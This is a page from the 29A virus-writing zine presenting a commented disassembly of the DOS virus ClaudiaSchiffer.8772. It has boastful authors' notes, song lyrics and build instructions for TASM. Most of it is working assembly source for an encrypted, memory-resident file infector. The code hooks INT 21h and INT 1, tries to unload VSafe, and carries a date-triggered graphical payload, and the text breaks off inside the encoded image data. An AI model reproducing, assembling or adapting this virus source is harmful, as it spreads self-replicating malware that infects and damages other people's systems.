Copy Link
Add to Bookmark
Report
29A Issue 03 05 14
;
; ÍÎÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÎÍ
; º ClaudiaSchiffer.8772 º
; º disassembly by º
; º Darkman/29A & Mister Sandman/29A º
; ÍÎÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÎÍ
;
; Darkman and Mister Sandman, that is us, in our first coproduction project,
; very proudly present our disassembly of the Claudia Schiffer virus. It was
; a matter of one couple hours of work each to complete this source, a great
; thing for us both, as no one of us expected each other to be that quick :)
;
; The virus itself wasn't technically speaking a big challenge, but a pretty
; good exercise and who knows if the first of a long series of disassemblies
; Darkman and i might do together in the near future. But, by now, it's just
; the source of a virus which was in hot fashion not too long ago due to its
; spectacular graphical payload. In my opinion it is quite poorly written as
; it does a lot of weird non-sense things and spends a lot of unuseful bytes
; in routines which could have been written in a much better way. Apart from
; this, its modularization ain't too brilliant as well.
;
; Anyway it doesn't lack at all in the sense that it uses some nice features
; such as full stealth (both DTA and FCB, in opens and reads), int 1 hooking
; and some more you'll have the chance to discover on your own by going thru
; this disassembled, labelled, and commented source code. The most important
; feature of this virus, as i said before, is its payload, which consists on
; displaying an image of Claudia Schiffer together with some lyrics from the
; song "22 Acacia Avenue", by Iron Maiden. Heavy metal fans, you're lucky :)
;
; Let's read some words from our sponsor (buahahaha):
;
; - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8
; Claudia.8772
; ÄÄÄÄÄÄÄÄÄÄÄÄ
; It is not a dangerous memory resident encrypted parasitic stealth virus.
; It hooks INT 21h and writes itself to the end of EXE files that are ac-
; cessed. Starting from August 25 1996 the virus manifests itself by a vi-
; deo effect: it turns the computer to the graphic video mode, displays an
; image of Claudia Schiffer and displays the message:
;
; Das ist ClaudiaSchiffer virus by OS
; Sometimes when U stroling down the
; Avenue the way U walk it makes men
; Thinkof HAVING U when U walking
; Down the street everybody stops
; & turns 2 stare at U! (IrM)
; Hope 2 meet U...somewhere in time
; - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8
;
; Btw, that's a pretty short description coming from Kaspy for a russian vi-
; rus. I think he probably just didn't know about its country of origin :P
;
; And now it is time to listen to Kraftwerk's song "Das Modell", which has a
; lot to do with this virus and is, btw, one of my favorite oldies... do not
; hesitate for a single second if you have the chance to download its MP3.
;
;
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; She's a model and she's looking good.
; I'd like to take her home, that's understood.
; She plays hard to get, she smiles from time to time.
; It only takes a camera to change her mind.
;
; She's going out tonight, loves drinking just champagne.
; And she has been checking nearly all the men.
; She's playing her game and you can hear them say,
; "she's looking good, for beauty we will pay".
;
; She's posing for consumer products now, and then,
; for every camera she gives the best she can.
; I saw her on the cover of a magazine.
; Now she's a big success, I want to meet her again.
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; (The Man Machine)
;
;
; Compile with
; ÄÄÄÄÄÄÄÄÄÄÄÄ
; tasm /m claudia.asm
; tlink /t /x claudia.obj
.model tiny
.code
org 100h ; Origin of Claudia.8772
code_begin:
jmp crypt_begin
db 1bh dup (90h)
virus_begin:
crypt_offset equ word ptr $+01h ; Offset of crypt_begin
lea bx,crypt_begin ; BX = offset of crypt_begin
crypt_key equ byte ptr $+01h ; Offset of decryption key
mov al,00h ; AL = decryption key
crypt_loop:
xor cs:[bx],al ; Decrypt a byte
inc bx ; Increase index register
neg al ; Negate decryption key
crypt_offse_ equ word ptr $+02h ; Offset of crypt_end
cmp bx,offset crypt_end ; Offset of crypt_end?
jbe crypt_loop ; Below or equal? Jump to crypt_loop
crypt_begin:
call delta_offset
delta_offset:
pop bp ; Load BP from stack
sub bp,offset delta_offset
push ds es ; Save segments at stack
jmp test_install
nop
db 11101001b ; JMP imm16 (opcode 0e9h)
test_install:
mov ax,'CS' ; Claudia.8772 function
int 21h
cmp bx,'OS' ; Already installed?
jne uninstall ; Not equal? Jump to uninstall
jmp virus_exit
uninstall:
mov ax,0fa01h ; PC Tools V8+ Vsafe, Vwatch - Uin...
mov dx,5945h ; " " " " " " "
int 21h
mov ah,2ah ; Get system date
int 21h
cmp cx,7cch ; 1996?
jne payload ; Not equal? Jump to payload
cmp dx,819h ; August 25?
jb allocate_mem ; Below? Jump to allocate_mem
payload:
push es ; Save ES at stack
call payload_
pop es ; Load ES from stack
allocate_mem:
mov ax,es ; AX = segment of PSP for current ...
dec ax ; AX = segment of current Memory C...
mov ds,ax ; DS = " " " " "
sub word ptr ds:[03h],(data_end-code_begin+0fh)/10h+01h
sub word ptr ds:[12h],(data_end-code_begin+0fh)/10h+01h
mov ax,ds:[12h] ; AX = segment of the virus
mov ds,ax ; DS = " " " "
sub ax,0fh ; Subtract fifteen from segment of...
mov es,ax ; ES = segment of the virus - 0fh
mov byte ptr ds:[00h],'Z'
mov word ptr ds:[01h],08h
mov word ptr ds:[03h],(data_end-code_begin+0fh)/10h+01h
push cs ; Save CS at stack
pop ds ; Load DS from stack (CS)
mov di,100h ; DI = offset of virus in memory
mov cx,(code_end-code_begin)
lea si,[bp+code_begin] ; SI = offset of code_begin
rep movsb ; Move the virus to top of memory
xor ax,ax ; Zero AX
mov ds,ax ; DS = segment of BIOS data segment
sub word ptr ds:[413h],(code_end-code_begin+3ffh)/400h-02h
mov si,(21h*04h) ; SI = offset of interrupt 21h
lea di,int21_addr ; DI = offset of int21_addr
movsw ; Get interrupt vector 21h
movsw ; " " " "
lea dx,[bp+int01_virus] ; DX = offset of int01_virus
mov ds:[(01h*04h)],dx ; Set interrupt vector 01h
mov ds:[(01h*04h+02h)],cs
push es ; Save ES at stack
mov ah,52h ; Get list of lists
int 21h
mov ax,es ; AX = segment of DOS list of lists
mov cs:[bp+dos_list_seg],ax
pop es ; Load ES from stack
mov [bp+virus_seg],es ; Store segment of virus in top of...
mov ax,100h ; Set trap flag
push ax ; Save AX at stack
popf ; Load flags from stack
mov ah,0bh ; Get stdin status
pushf ; Save flags at stack
call dword ptr ds:[(21h*04h)]
xor ax,ax ; Clear trap flag
push ax ; Save AX at stack
popf ; Load flags from stack
mov word ptr [si-04h],00h
mov word ptr [si-04h],offset int21_virus
mov [si-02h],es ; Set interrupt vector 21h
virus_exit:
pop es ds ; Load segments from stack
mov ax,ds ; AX = segment of PSP for current ...
add ax, cs:[bp+initial_cs_]
mov cs:[bp+initial_cs],ax
mov ax, cs:[bp+initial_ip_]
mov cs:[bp+initial_ip],ax
mov ax,ds ; AX = segment of PSP for current ...
add ax,cs:[bp+initial_ss]
cli ; Clear interrupt-enable flag
mov ss,ax ; SS = initial SS relative to star...
mov sp,cs:[bp+initial_sp]
call zero_regs
db 11101010b ; JMP imm32 (opcode 0eah)
initial_ip dw 00h ; Initial IP
initial_cs dw 0fff0h ; Initial CS relative to start of ...
message db ' Das ist ClaudiaSchiffer virus by OS ',0dh,0ah,0ah,0ah
db ' Sometimes when U stroling down the',0dh,0ah,0ah
db ' Avenue the way U walk it makes men',0dh,0ah,0ah
db ' Thinkof HAVING U when U walking',0dh,0ah,0ah
db ' Down the street everybody stops',0dh,0ah,0ah
db ' & turns 2 stare at U!',9,'(IrM)',0dh,0ah,0ah,0ah
db 'Hope 2 meet U...somewhere in time$'
image_byte db ? ; Byte within image
counter dw ? ; Counter
image db 0c1h,0fah,7eh,0c1h,0fah,7eh,0c1h,0d6h,0c1h,0fah,7eh,6dh
db 0c1h,0fah,7eh,6dh,0c1h,0fah,0c2h,7eh,42h,3ah,02h,0c2h
db 0f7h,77h,26h,61h,71h,04h,1fh,34h,45h,5ch,0c2h,1bh,7fh,1bh
db 0c2h,4ch,36h,45h,09h,1fh,0c1h,0cdh,34h,0c2h,45h,4ch,24h
db 4ch,0c1h,0e0h,45h,0c1h,0e0h,0c1h,0f6h,4ch,0c1h,0f1h,0bah
db 0c2h,0dh,72h,0c1h,0f1h,7fh,34h,1fh,0c1h,0d4h,53h,0c1h
db 0f8h,0ffh,00h,0ffh,00h,0ffh,00h,0ffh,00h,0c6h,00h,0c1h
db 0fah,7eh,0c1h,0fah,0c2h,7eh,0c1h,0fah,7eh,0c1h,0fah,6dh
db 0c3h,0fah,0c2h,7eh,0c1h,0e3h,0c1h,0d5h,0c1h,0d3h,86h,23h
db 39h,1dh,53h,14h,32h,57h,1fh,12h,5ch,0c3h,1bh,0c2h,36h,5ch
db 80h,34h,6ah,1fh,4fh,80h,0c2h,0b3h,6eh,0c2h,76h,0c2h,4ch
db 36h,6eh,0c1h,0f6h,0c1h,0f1h,0bah,76h,0c2h,72h,76h,0c1h
db 0f6h,45h,34h,32h,1eh,30h,0ffh,00h,0ffh,00h,0ffh,00h,0ffh
db 00h,0c6h,00h,0c1h,0d6h,0c1h,0fah,7eh,0c2h,0fah,7eh,0c1h
db 0fah,0c3h,7eh,0c1h,0fah,0c3h,7eh,91h,51h,0c2h,0cfh,0c2h
db 59h,53h,04h,0c1h,0dfh,57h,1fh,11h,1fh,12h,5ch,36h,1bh,5ch
db 45h,0b3h,6ah,09h,1fh,57h,63h,30h,14h,0c1h,0d4h,48h,8bh
db 31h,05h,0c2h,6eh,0c2h,05h,31h,05h,0c1h,0f6h,76h,0b8h,4ch
db 1bh,36h,12h,14h,30h,1eh,0ffh,00h,0ffh,00h,0ffh,00h,0ffh
db 00h,0c6h,00h,0c2h,7eh,42h,7eh,0c1h,0fah,7eh,0c2h,0fah,7eh
db 0c1h,0d6h,0c2h,7eh,0c1h,0fah,0c1h,0e3h,70h,10h,0c1h,0d8h
db 0c1h,0f5h,59h,06h,55h,63h,11h,57h,32h,11h,1fh,34h,45h
db 0c2h,36h,0b3h,34h,0c2h,6ah,0c2h,34h,0b3h,12h,1fh,4fh,0c1h
db 0d4h,53h,0eh,0c2h,46h,94h,09h,6eh,0c1h,0f6h,05h,0a6h,48h
db 09h,0c1h,0e0h,36h,6eh,36h,05h,57h,0c1h,0d4h,06h,0ffh,00h
db 0ffh,00h,0ffh,00h,0ffh,00h,0c6h,00h,0c2h,0fah,7eh,0c1h
db 0fah,7eh,0c1h,0fah,7eh,6dh,7eh,42h,7eh,6dh,0c1h,0e3h,0c1h
db 0c2h,0c1h,0f0h,41h,6ch,61h,1dh,53h,14h,60h,32h,0c2h,63h
db 11h,34h,45h,5ch,0c2h,45h,6ah,4fh,2eh,34h,45h,5ch,36h,1bh
db 5ch,07h,2eh,14h,1dh,0c2h,94h,71h,59h,6ch,0c1h,0cdh,0b8h
db 0b9h,17h,0c1h,0e0h,71h,46h,94h,48h,0a6h,09h,0c1h,0cdh,14h
db 0ffh,00h,0ffh,00h,0ffh,00h,0ffh,00h,0c6h,00h,7eh,0c1h
db 0fah,7eh,0c2h,0fah,7eh,0c1h,0fah,7eh,0c1h,0fah,0c2h,7eh
db 0c1h,0fah,6dh,0c1h,0f0h,46h,94h,0bbh,94h,71h,30h,0c2h,14h
db 63h,32h,1fh,34h,45h,5ch,0c2h,45h,9dh,4fh,55h,0c2h,2eh,34h
db 45h,7fh,84h,7fh,45h,12h,14h,30h,71h,94h,71h,4fh,6ch,56h
db 39h,46h,0b2h,0c2h,0b8h,80h,8fh,79h,0c2h,0e7h,6fh,61h,0ffh
db 00h,0ffh,00h,0ffh,00h,0ffh,00h,0c6h,00h,7eh,0c1h,0fah,7eh
db 0c1h,0d6h,7eh,0c1h,0fah,7eh,6dh,42h,7eh,91h,0c1h,0e3h,3ah
db 61h,0a6h,6ch,30h,94h,0c1h,0d4h,14h,57h,63h,04h,1fh,34h
db 5ch,36h,45h,5fh,4fh,0ah,1dh,0ah,55h,63h,34h,5ch,1bh,84h
db 0c2h,1bh,45h,1fh,14h,30h,53h,94h,57h,09h,31h,65h,46h,26h
db 46h,0a6h,05h,0b3h,0c1h,0cdh,3eh,4fh,8fh,94h,0ffh,00h,0ffh
db 00h,0ffh,00h,0ffh,00h,0c6h,00h,0c1h,0fah,7eh,0c1h,0fah
db 7eh,0c1h,0fah,7eh,0c1h,0fah,0c1h,0d6h,7eh,54h,49h,0c1h
db 0e4h,59h,0c2h,4fh,0c2h,71h,14h,55h,14h,32h,14h,32h,1fh
db 34h,45h,34h,18h,0ah,0c2h,79h,0c1h,0e5h,79h,5eh,0ah,55h
db 6ah,36h,1bh,0c2h,24h,1bh,80h,55h,53h,46h,1dh,6ch,0a6h,34h
db 0b3h,0c1h,0e9h,80h,8fh,71h,0c1h,0cdh,31h,0b3h,09h,2eh,1fh
db 32h,0ffh,00h,0ffh,00h,0ffh,00h,0ffh,00h,0c6h,00h,7eh,42h
db 7eh,0c1h,0fah,7eh,0c1h,0fah,7eh,0c1h,0fah,7eh,0c1h,0e3h
db 0c1h,0c2h,23h,48h,0c2h,4fh,0c2h,71h,4fh,0c2h,57h,1fh,63h
db 32h,34h,07h,6ah,74h,5eh,2dh,79h,0c1h,0e5h,40h,0c1h,0e5h
db 79h,2dh,74h,2eh,80h,45h,1bh,84h,4ch,1bh,2eh,53h,59h,46h
db 0c1h,0f8h,61h,8fh,1fh,80h,1bh,6eh,0c1h,0e0h,31h,0c2h,05h
db 80h,0c3h,1fh,0ffh,00h,0ffh,00h,0ffh,00h,0ffh,00h,0c6h,00h
db 0c1h,0d6h,7eh,0c1h,0fah,7eh,0c2h,0fah,7eh,0c1h,0fah,49h
db 0c1h,0c2h,0c1h,0f7h,46h,0a6h,57h,14h,0c2h,4fh,57h,09h,1fh
db 32h,60h,1fh,12h,09h,0c1h,0cah,2dh,0c4h,0e5h,0aeh,0c2h
db 0e5h,2dh,0ah,55h,2eh,6ah,0c1h,0e0h,1bh,0c1h,0f1h,0c1h
db 0f6h,0b3h,94h,0c1h,0f8h,0c1h,0f5h,0c1h,0f8h,39h,0eh,14h
db 2eh,5fh,1bh,6eh,1bh,0c2h,36h,45h,1fh,34h,1fh,0ffh,00h
db 0ffh,00h,0ffh,00h,0ffh,00h,0c6h,00h,7eh,0c1h,0fah,7eh
db 0c2h,0fah,7eh,0c1h,0fah,7eh,0c1h,0fah,21h,0a8h,14h,57h
db 63h,1fh,0c2h,4fh,09h,34h,0c3h,1fh,34h,80h,18h,0ah,16h
db 0c3h,0e5h,0aeh,0c2h,40h,0bh,79h,5eh,0ah,0c2h,55h,6ah,45h
db 0c1h,0f6h,6eh,0b3h,48h,0c1h,0e7h,23h,46h,0c1h,0fbh,7ah
db 46h,30h,63h,1fh,05h,5ch,0c2h,45h,12h,0c3h,34h,0ffh,00h
db 0ffh,00h,0ffh,00h,0ffh,00h,0c6h,00h,0c1h,0fah,7eh,0c1h
db 0fah,7eh,0c1h,0fah,7eh,0c1h,0fah,7eh,0c1h,0d6h,86h,71h
db 0c1h,0d4h,4fh,0c3h,57h,1fh,0c2h,09h,34h,0c2h,1fh,5fh,18h
db 30h,5eh,79h,16h,0c1h,0e5h,0c2h,0aeh,7bh,0bh,0aeh,40h,0bh
db 79h,5eh,0ah,30h,3eh,0b3h,45h,09h,0a6h,61h,0c1h,0e2h,0c1h
db 0f8h,7ah,4ah,0c1h,0f2h,1dh,5dh,30h,09h,12h,36h,5ch,0c2h
db 45h,0b3h,1fh,0ffh,00h,0ffh,00h,0ffh,00h,0ffh,00h,0c6h,00h
db 7eh,0c1h,0fah,7eh,0c1h,0fah,7eh,0c1h,0fah,7eh,0c1h,0fah
db 3ah,0eh,0c2h,14h,4fh,57h,4fh,0c3h,09h,34h,09h,34h,0c2h
db 6ah,5bh,0ah,5eh,0c2h,0e5h,7bh,0c2h,0aeh,0bh,40h,0c3h,0adh
db 0bh,6fh,79h,1dh,0ah,55h,3eh,2eh,0a6h,46h,0c2h,0f8h,23h
db 4ah,0c1h,0c4h,0c1h,0f8h,61h,69h,53h,4fh,80h,0c2h,36h,0b3h
db 34h,11h,0ffh,00h,0ffh,00h,0ffh,00h,0ffh,00h,0c6h,00h,7eh
db 0c1h,0fah,7eh,42h,7eh,0c1h,0fah,7eh,91h,23h,48h,4fh,14h
db 4fh,0a6h,0c3h,09h,45h,31h,05h,0b3h,4fh,55h,0c1h,0c9h,5bh
db 5eh,6bh,0aeh,7bh,0bh,7bh,40h,0aeh,0c3h,0adh,22h,0c2h,40h
db 0bh,6fh,79h,0ah,6ch,30h,6ch,0c1h,0f5h,0c2h,0f8h,7ah,0c1h
db 0c4h,0c1h,0fbh,56h,0c1h,0f8h,7dh,0fh,06h,14h,09h,0b3h,34h
db 1fh,0ffh,00h,0ffh,00h,0ffh,00h,0ffh,00h,0c6h,00h,0c1h
db 0fah,7eh,0c1h,0d6h,7eh,0c1h,0fah,7eh,0c1h,0fah,0c1h,0d5h
db 0c1h,0d8h,57h,48h,14h,0c2h,0a6h,0c3h,09h,0c3h,05h,0beh
db 55h,1dh,5bh,7ch,9ah,0bh,0c2h,7bh,22h,0aeh,40h,22h,0adh
db 0c2h,7dh,0c2h,0adh,43h,0aeh,56h,7dh,0c1h,0e5h,0c3h,1dh
db 0c2h,59h,0c1h,0e7h,39h,77h,0c1h,0fbh,0c1h,0f0h,0c1h,0f8h
db 8dh,0fh,0c1h,0edh,0c1h,0e7h,06h,14h,34h,1fh,0ffh,00h,0ffh
db 00h,0ffh,00h,0ffh,00h,0c6h,00h,0c2h,7eh,0c1h,0fah,7eh
db 0c2h,0fah,91h,0c1h,0d3h,48h,94h,0c1h,0d4h,0c2h,0a6h,57h
db 09h,0b3h,31h,05h,0c1h,0f6h,36h,60h,30h,5bh,7ch,2dh,0c1h
db 0c3h,0bh,7bh,0adh,0c2h,7bh,0adh,0aeh,0adh,7dh,0c2h,0adh
db 22h,0adh,22h,0c2h,40h,43h,79h,59h,41h,0c1h,0cfh,26h,59h
db 39h,0c1h,0e7h,77h,0c1h,0f0h,0c1h,0f8h,0bh,0c1h,0e7h,39h
db 0c2h,0edh,8dh,1eh,57h,0ffh,00h,0ffh,00h,0ffh,00h,0ffh,00h
db 0c6h,00h,0c5h,0fah,91h,97h,10h,2fh,94h,0c2h,48h,3bh,0a6h
db 57h,0b3h,05h,36h,0c1h,0f6h,45h,0c2h,30h,7ch,5eh,0c2h,6bh
db 0bh,7bh,0bh,7bh,0aeh,40h,0c5h,0adh,22h,7dh,0adh,22h,7dh
db 40h,6fh,59h,10h,59h,0c1h,0f2h,61h,6fh,0fh,0c2h,0f0h,0c1h
db 0f8h,6fh,39h,0fh,0c3h,0edh,26h,0c1h,0d2h,0ffh,00h,0ffh
db 00h,0ffh,00h,0ffh,00h,0c6h,00h,42h,0c1h,0fah,7eh,6dh,7eh
db 0c1h,0c2h,67h,0c1h,0cfh,2fh,46h,2fh,0c1h,0cfh,0c1h,0d8h
db 3bh,0c1h,0cch,0b3h,0c3h,05h,18h,0ah,5bh,2dh,0c2h,6bh,0bh
db 7bh,0bh,7bh,40h,0c2h,0aeh,0c3h,0adh,0c2h,22h,0adh,7dh
db 0adh,22h,7dh,43h,56h,79h,59h,39h,23h,06h,04h,0c3h,39h
db 0c1h,0e7h,10h,39h,0c1h,0f0h,77h,0c1h,0eah,0c1h,0fbh,0fh
db 0c1h,0f2h,0ffh,00h,0ffh,00h,0ffh,00h,0ffh,00h,0c6h,00h
db 0c1h,0fah,0c2h,7eh,0c2h,0fah,0c1h,0c2h,68h,0c1h,0d8h,46h
db 0c1h,0cfh,7ah,0c1h,0f7h,0c1h,0cfh,46h,8fh,0c2h,05h,0b3h
db 4fh,30h,5eh,69h,0c2h,6bh,0bh,0c2h,7bh,0c2h,0bh,7bh,22h
db 7bh,0aeh,22h,0c2h,0adh,22h,0c3h,7dh,0adh,7dh,0adh,0c2h
db 6fh,59h,56h,0c1h,0d3h,43h,14h,53h,39h,77h,39h,0c1h,0d3h
db 59h,26h,77h,0fh,77h,39h,0c1h,0f2h,0ffh,00h,0ffh,00h,0ffh
db 00h,0ffh,00h,0c6h,00h,0c2h,0fah,91h,6dh,0c1h,0fah,0c1h
db 0dbh,68h,0c1h,0cfh,0a8h,59h,51h,0c1h,0d3h,2fh,48h,31h
db 0c2h,05h,8fh,0ah,5eh,0c3h,2dh,0bh,0c1h,0e5h,7bh,0bh,7bh
db 0bh,0aeh,7bh,40h,0c2h,0adh,22h,0aeh,0adh,0c2h,7dh,52h
db 0c2h,7dh,22h,40h,56h,59h,6fh,59h,39h,0c1h,0e7h,4fh,69h
db 43h,39h,26h,94h,2dh,0c1h,0f8h,6fh,06h,59h,06h,0ffh,00h
db 0ffh,00h,0ffh,00h,0ffh,00h,0c6h,00h,0c4h,0fah,0c1h,0e4h
db 0c1h,0dbh,68h,7ah,0c1h,0f0h,51h,0c1h,0d3h,47h,0c1h,0d3h
db 4fh,0b3h,05h,0c1h,0cdh,8fh,30h,1dh,2dh,0c4h,0e5h,0bh,7bh
db 40h,0c2h,0aeh,40h,7bh,0c3h,0adh,22h,0adh,0c2h,7dh,0c2h
db 52h,0c2h,7dh,43h,22h,6fh,0c1h,0f8h,6fh,77h,0c1h,0c4h,30h
db 14h,33h,39h,26h,0c3h,69h,06h,0c2h,53h,69h,0ffh,00h,0ffh
db 00h,0ffh,00h,0ffh,00h,0c6h,00h,0c2h,0fah,6dh,91h,70h,0c1h
db 0eah,0c1h,0d5h,42h,0c1h,0d6h,0c1h,0c2h,67h,0c1h,0d5h,7ah
db 0a6h,09h,31h,0c2h,80h,0beh,18h,1dh,0bh,7bh,0c1h,0e5h,7bh
db 0bh,0c3h,0aeh,40h,0aeh,22h,0c4h,0adh,0c2h,7dh,0adh,0c2h
db 52h,0c2h,7dh,0c2h,22h,06h,8dh,59h,0c1h,0e2h,0c1h,0c4h,8dh
db 30h,04h,6fh,0c1h,0f8h,06h,53h,55h,5bh,0b6h,1eh,30h,0ffh
db 00h,0ffh,00h,0ffh,00h,0ffh,00h,0c6h,00h,7eh,6dh,0c2h,0c2h
db 67h,0c1h,0dbh,6dh,54h,0c1h,0dbh,0c2h,70h,0c1h,0fah,4ah
db 0a6h,1fh,2eh,31h,6eh,36h,0b7h,55h,0c2h,0e5h,6bh,0bh,0c2h
db 0aeh,0adh,40h,0c2h,0aeh,0c5h,0adh,0c5h,7dh,52h,0adh,22h
db 0c1h,0e7h,2dh,0c1h,0e7h,0c1h,0f8h,56h,0c2h,77h,69h,5dh
db 1eh,26h,6fh,53h,30h,04h,5bh,1eh,5dh,0ffh,00h,0ffh,00h
db 0ffh,00h,0ffh,00h,0c6h,00h,42h,6dh,0c1h,0c2h,3ah,0c1h
db 0e4h,0c1h,0c2h,0c1h,0e4h,21h,0c1h,0f7h,0c1h,0d3h,0c1h
db 0cfh,39h,94h,0c1h,0cdh,4fh,0c2h,46h,71h,0b2h,0c1h,0e0h
db 2ch,0ah,0c3h,0e5h,0c3h,0aeh,22h,0adh,22h,0c2h,0aeh,0adh
db 0c4h,7dh,43h,0c4h,7dh,0adh,40h,79h,2dh,6fh,59h,39h,0c1h
db 0d9h,0c1h,0e7h,53h,0c2h,5dh,6fh,33h,53h,55h,1eh,0b6h,69h
db 0ffh,00h,0ffh,00h,0ffh,00h,0ffh,00h,0c6h,00h,6dh,7eh,0c1h
db 0e4h,6dh,0c1h,0c2h,3ah,97h,23h,0c1h,0f8h,0c1h,0efh,48h
db 71h,4fh,09h,4fh,0c2h,1dh,61h,0bbh,9dh,80h,2ch,0ah,6bh
db 0c1h,0e5h,0bh,0adh,40h,0adh,7dh,0c4h,0adh,0c3h,7dh,0c2h
db 52h,0adh,0c3h,7dh,0adh,40h,0bh,2dh,6fh,1dh,0c1h,0e7h,77h
db 0c1h,0e7h,8dh,0c2h,0b6h,69h,06h,69h,0c2h,33h,0c2h,8dh
db 0ffh,00h,0ffh,00h,0ffh,00h,0ffh,00h,0c6h,00h,0c1h,0fah
db 0c2h,91h,0c1h,0c2h,0c1h,0eah,0c1h,0f7h,68h,51h,0a8h,0c1h
db 0d4h,0c2h,57h,14h,48h,0a6h,9dh,3eh,0c2h,5eh,0bbh,9dh,0c1h
db 0e0h,55h,2dh,6bh,0bh,0aeh,0adh,40h,7dh,40h,7dh,0c3h,0adh
db 0c4h,7dh,52h,0c2h,7dh,0adh,7dh,40h,0bh,2dh,61h,30h,0c1h
db 0f5h,39h,43h,39h,0c1h,0e7h,06h,0b6h,69h,33h,8dh,7bh,0fh
db 0c1h,0e7h,0ffh,00h,0ffh,00h,0ffh,00h,0ffh,00h,0c6h,00h
db 0c2h,6dh,0c1h,0c2h,3ah,67h,02h,0c1h,0eah,21h,26h,46h,0c1h
db 0d4h,09h,0c2h,0a6h,2bh,76h,8ah,2ch,0bfh,5eh,74h,0c1h,0e0h
db 2eh,5eh,6bh,0bh,0aeh,0c2h,40h,0aeh,0adh,22h,0adh,0cah,7dh
db 0adh,40h,0c2h,0bh,69h,53h,0ah,06h,26h,39h,77h,39h,33h,3dh
db 0b6h,9ah,33h,0c2h,22h,0ffh,00h,0ffh,00h,0ffh,00h,0ffh,00h
db 0c6h,00h,6dh,0c1h,0c2h,0c1h,0dbh,0c1h,0d5h,0c1h,0eah,0c1h
db 0dbh,3ah,51h,0c1h,0cfh,3bh,4fh,0b3h,0c1h,0cdh,62h,0afh
db 0c2h,00h,0aah,0b8h,0b2h,6ch,18h,9dh,5bh,2dh,0c2h,0bh,40h
db 0adh,40h,0aeh,22h,43h,0adh,0c2h,7dh,52h,7dh,52h,0c4h,7dh
db 0c2h,0adh,0bh,6bh,0c2h,69h,30h,94h,59h,0c1h,0e7h,77h,4ah
db 0c1h,0d9h,0c1h,0e7h,26h,0c2h,06h,33h,8dh,0ffh,00h,0ffh
db 00h,0ffh,00h,0ffh,00h,0c6h,00h,7eh,3ah,0c1h,0eah,0c2h
db 0dbh,0c3h,0eah,86h,3bh,0a6h,09h,8bh,85h,0afh,0c1h,0c5h
db 0c1h,0fch,0c1h,0dch,0c1h,0e8h,9bh,65h,30h,6ah,55h,0ah,2dh
db 0bh,7bh,40h,0aeh,40h,7dh,0c2h,0adh,0c4h,52h,7dh,0c2h,52h
db 0c2h,7dh,0adh,7bh,0c2h,0bh,0c2h,0ah,53h,0ah,69h,59h,0c1h
db 0e7h,77h,0c2h,91h,0c1h,0c4h,4ah,0c1h,0edh,0c2h,0fh,0ffh
db 00h,0ffh,00h,0ffh,00h,0ffh,00h,0c6h,00h,0c1h,0c2h,70h
db 0c1h,0dbh,0c2h,3ah,0c2h,0eah,0c1h,0f0h,59h,8fh,09h,31h
db 48h,64h,0a4h,75h,0a0h,8eh,8ch,87h,38h,20h,3eh,55h,5bh,33h
db 0bh,40h,0bh,6bh,2dh,0c2h,0bh,40h,0adh,0c2h,52h,0c1h,0d9h
db 0c3h,52h,7dh,0c2h,0adh,22h,0bh,6bh,0c1h,0c3h,0c2h,5bh
db 0c2h,53h,0c2h,1dh,69h,0c1h,0f2h,4ah,0c3h,0d6h,25h,0c1h
db 0c4h,0ffh,00h,0ffh,00h,0ffh,00h,0ffh,00h,0c6h,00h,0c1h
db 0c2h,0c1h,0dbh,0c1h,0eah,0c1h,0d5h,67h,0c2h,0eah,39h,26h
db 61h,6ch,1dh,59h,0c1h,0cch,8ah,0ach,0c1h,0d5h,0c1h,0feh
db 0a1h,0bdh,0c1h,0f4h,0b8h,0b7h,30h,33h,0c4h,0bh,5eh,0ah
db 0c1h,0cah,74h,0ah,79h,56h,52h,0c1h,0d9h,92h,52h,0c3h,7dh
db 0adh,7bh,0bh,6bh,2dh,0c4h,55h,30h,53h,69h,0ah,33h,6fh
db 0c1h,0d2h,26h,4ah,0c1h,0c4h,0ffh,00h,0ffh,00h,0ffh,00h
db 0ffh,00h,0c6h,00h,3ah,0c3h,0eah,0c2h,7ah,0c2h,0f2h,0c1h
db 0e7h,26h,6fh,10h,0c1h,0f5h,41h,6ch,85h,19h,0c1h,0fdh,0c1h
db 0dch,0c2h,0a1h,64h,0c1h,0ddh,30h,6fh,0c2h,22h,40h,2dh,30h
db 63h,0c1h,0cdh,2eh,9dh,0c2h,5fh,5eh,0c2h,43h,77h,0c1h,0d9h
db 52h,43h,22h,0adh,7bh,6bh,0c1h,0c3h,5bh,63h,4fh,60h,14h
db 63h,1fh,1dh,06h,6fh,0c1h,0f8h,6fh,61h,59h,0ffh,00h,0ffh
db 00h,0ffh,00h,0ffh,00h,0c6h,00h,70h,67h,0c1h,0eah,21h,0c1h
db 0f7h,0c1h,0eah,0c1h,0f2h,0eh,06h,0c1h,0f5h,59h,56h,43h
db 39h,56h,6ch,19h,0bfh,0ach,99h,0a9h,2fh,41h,5eh,40h,43h
db 0c2h,22h,6fh,5eh,30h,18h,2eh,9ch,9dh,5ch,0c1h,0e9h,18h
db 0aeh,0c1h,0e2h,0c2h,52h,7dh,0c2h,22h,7bh,0bh,2dh,5bh,30h
db 18h,60h,2eh,57h,6ah,1fh,0b3h,6ah,4fh,0c1h,0d4h,71h,30h
db 0ffh,00h,0ffh,00h,0ffh,00h,0ffh,00h,0c6h,00h,0c3h,0eah
db 0c2h,21h,77h,86h,59h,61h,59h,6fh,56h,22h,43h,39h,56h,0c1h
db 0f5h,0bbh,41h,0a8h,41h,1dh,6fh,40h,0c2h,7dh,43h,40h,6fh
db 2dh,0c4h,0ah,30h,4fh,9dh,2ch,3eh,2dh,40h,52h,7dh,0aeh
db 0adh,0aeh,0bh,0c1h,0c3h,7ch,30h,63h,1fh,57h,2eh,80h,11h
db 5fh,45h,34h,6ah,1fh,9dh,0ffh,00h,0ffh,00h,0ffh,00h,0ffh
